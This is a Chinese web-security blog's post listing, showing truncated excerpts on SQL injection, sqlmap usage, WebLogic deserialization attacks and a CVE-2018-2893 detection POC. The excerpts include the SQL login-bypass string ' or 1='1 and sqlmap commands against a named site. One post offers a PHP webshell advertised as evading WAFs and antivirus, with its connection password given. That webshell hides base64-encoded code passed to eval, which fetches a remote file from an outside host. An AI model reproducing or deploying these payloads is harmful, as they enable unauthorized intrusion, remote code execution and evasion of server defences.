web安全
「已注销」
本博客可能不在更新,有问题关注公众号:【漫橘长】B站【阿浪的日常】
展开
-
SQL万能密码:' or 1='1
SQL万能密码:’ or 1='1select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’输入用户名:’ or 1=‘1SQL变成下面这个样子:select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’1=‘1’ 永远为真,所以就验...转载 2018-10-09 13:06:33 · 16453 阅读 · 11 评论 -
SQLmap笔记
SQLmap笔记sqlmap -u http://www.baidu.com/news_show.aspx?id=97 检测注入点是否可用 sqlmap -u http://www.baidu.com/news_show.aspx?id=97 --tables 列出当前web数据库所有表名nmap --script=vuln 漏洞扫描脚本sqlmap -u 注...原创 2018-10-17 13:28:08 · 442 阅读 · 0 评论 -
2018最新过全WAF/CDN/D盾/安全狗小马Or大马
2018最新过全WAF/CDN/D盾/安全狗小马Or大马首先感谢土司大佬:Math_random上代码—注意菜刀链接密码为:ximcx<?php$x="BaSe64";$b="_deCOde";$c=$x.$b;eval($cc = $c('JGhhbmRsZSA9IGZvcGVuKCdodHRwOi8veGltY3guY24vMi50eHQnLCAncicpOw0KICA...转载 2018-10-17 13:33:53 · 3375 阅读 · 4 评论 -
记录WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址
记录WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址首先,郭姓某牛丢来了一个有weblogic漏洞的地址http://x.x.x.x:7001说用k8的weblogic2628去getshell不能链接shell,我也试了下,好像确实不能链接…接着想着是否存在昨年的weblogic,试了下,果然存在。接下来写入shell,访问发现,如下图。此时我的...转载 2018-10-17 13:41:38 · 3938 阅读 · 1 评论 -
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC#!env python# -*- coding: utf-8 -*-import socketimport timeimport reimport sysVUL=['CVE-2018-2893']#remote ip changed to :127.0.0.1PAYLOAD=['ACED0005...原创 2018-10-17 13:46:40 · 6923 阅读 · 3 评论